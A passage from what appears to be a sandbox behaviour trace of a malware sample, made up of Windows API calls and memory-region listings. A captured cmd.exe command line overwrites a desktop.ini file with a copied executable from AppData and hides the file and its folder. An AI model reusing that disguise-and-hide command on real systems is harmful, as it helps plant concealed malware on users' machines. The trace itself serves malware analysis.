nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 
0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.407] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.407] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x32, lpOverlapped=0x0) returned 1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] GetFileType (hFile=0x4c) returned 0x1 [0225.407] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.407] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x32, lpOverlapped=0x0) 
returned 1 [0225.408] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.408] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.408] _close (_FileHandle=4) returned 0 [0225.408] FindNextFileW (in: hFindFile=0x410e60, lpFindFileData=0x22f5a4 | out: lpFindFileData=0x22f5a4) returned 0 [0225.408] GetLastError () returned 0x12 [0225.408] FindClose (in: hFindFile=0x410e60 | out: hFindFile=0x410e60) returned 1 [0225.409] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0225.409] _close (_FileHandle=3) returned 0 [0225.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.410] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.410] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.410] SetConsoleInputExeNameW () returned 0x1 [0225.410] GetConsoleOutputCP () returned 0x1b5 [0225.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.410] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.410] exit (_Code=0) Process: id = "595" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xc84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h 
\"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33649 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33650 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33651 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33652 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 33653 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33654 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33655 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33656 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33657 start_va = 0x7ffde000 end_va = 
0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 33658 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33741 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33742 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33743 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33744 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 33745 start_va = 0x530000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 33746 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33747 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33748 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33749 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") 
Region: id = 33750 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33751 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33752 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33753 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33754 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33755 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 33756 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33757 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33758 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33759 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33760 
start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33761 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33762 start_va = 0x540000 end_va = 0x640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 33763 start_va = 0x650000 end_va = 0x124ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 33764 start_va = 0x1250000 end_va = 0x13b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001250000" filename = "" Region: id = 33861 start_va = 0x13c0000 end_va = 0x168efff entry_point = 0x13c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 819 os_tid = 0xdac [0225.122] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fe84 | out: lpSystemTimeAsFileTime=0x22fe84*(dwLowDateTime=0xb9bfcb00, dwHighDateTime=0x1d440a9)) [0225.122] GetCurrentProcessId () returned 0xc84 [0225.122] GetCurrentThreadId () returned 0xdac [0225.122] GetTickCount () returned 0x3e291 [0225.122] QueryPerformanceCounter (in: lpPerformanceCount=0x22fe7c | out: lpPerformanceCount=0x22fe7c*=28191152664) returned 1 [0225.123] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.123] __set_app_type (_Type=0x1) [0225.123] __p__fmode () returned 0x76b331f4 [0225.123] __p__commode () returned 0x76b331fc [0225.123] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.123] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.123] GetCurrentThreadId () returned 
0xdac [0225.123] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdac) returned 0x38 [0225.123] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.123] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.124] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.124] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.124] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fe14 | out: phkResult=0x22fe14*=0x0) returned 0x2 [0225.124] VirtualQuery (in: lpAddress=0x22fe4b, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.124] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.124] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.124] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.124] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fde4, dwLength=0x1c | out: lpBuffer=0x22fde4*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0225.124] GetConsoleOutputCP () returned 0x1b5 [0225.124] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.124] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0225.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.124] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0225.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.125] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.125] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.125] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.125] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.125] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0225.125] GetEnvironmentStringsW () returned 0x2f0458* [0225.125] FreeEnvironmentStringsW (penv=0x2f0458) returned 1 [0225.125] GetEnvironmentStringsW () returned 0x2f0458* [0225.126] FreeEnvironmentStringsW (penv=0x2f0458) returned 1 [0225.126] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed84 | out: phkResult=0x22ed84*=0x40) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x8, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x1, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x1, 
lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x0, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x40, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x40, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x40, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegCloseKey (hKey=0x40) returned 0x0 [0225.126] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed84 | out: phkResult=0x22ed84*=0x40) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x40, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x1, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x1, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.126] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x0, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x9, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x4, lpData=0x22ed90*=0x9, lpcbData=0x22ed88*=0x4) returned 0x0 [0225.126] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed8c, lpData=0x22ed90, lpcbData=0x22ed88*=0x1000 | out: lpType=0x22ed8c*=0x0, lpData=0x22ed90*=0x9, lpcbData=0x22ed88*=0x1000) returned 0x2 [0225.127] RegCloseKey (hKey=0x40) returned 0x0 [0225.127] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b9 [0225.127] srand (_Seed=0x5b8863b9) [0225.127] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"" [0225.127] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\"" [0225.127] GetCurrentDirectoryW 
(in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.127] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f1bb8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0225.127] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0225.127] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0225.127] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.127] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.127] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.127] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.128] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.128] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.128] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.128] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.128] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.128] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.128] GetEnvironmentStringsW () returned 0x2f25a8* [0225.128] FreeEnvironmentStringsW (penv=0x2f25a8) returned 1 [0225.128] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.128] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.128] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.128] _wcsicmp 
(_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.128] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.128] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.128] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.128] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.128] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.128] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.128] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.128] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22fb50, lpFilePart=0x22fb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22fb4c*="Desktop") returned 0x18 [0225.128] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.128] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f8cc | out: lpFindFileData=0x22f8cc) returned 0x2f0c38 [0225.129] FindClose (in: hFindFile=0x2f0c38 | out: hFindFile=0x2f0c38) returned 1 [0225.129] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f8cc | out: lpFindFileData=0x22f8cc) returned 0x2f0c38 [0225.129] FindClose (in: hFindFile=0x2f0c38 | out: hFindFile=0x2f0c38) returned 1 [0225.129] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f8cc | out: lpFindFileData=0x22f8cc) returned 0x2f0c38 [0225.129] FindClose (in: hFindFile=0x2f0c38 | out: hFindFile=0x2f0c38) returned 1 [0225.129] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.129] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.129] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") 
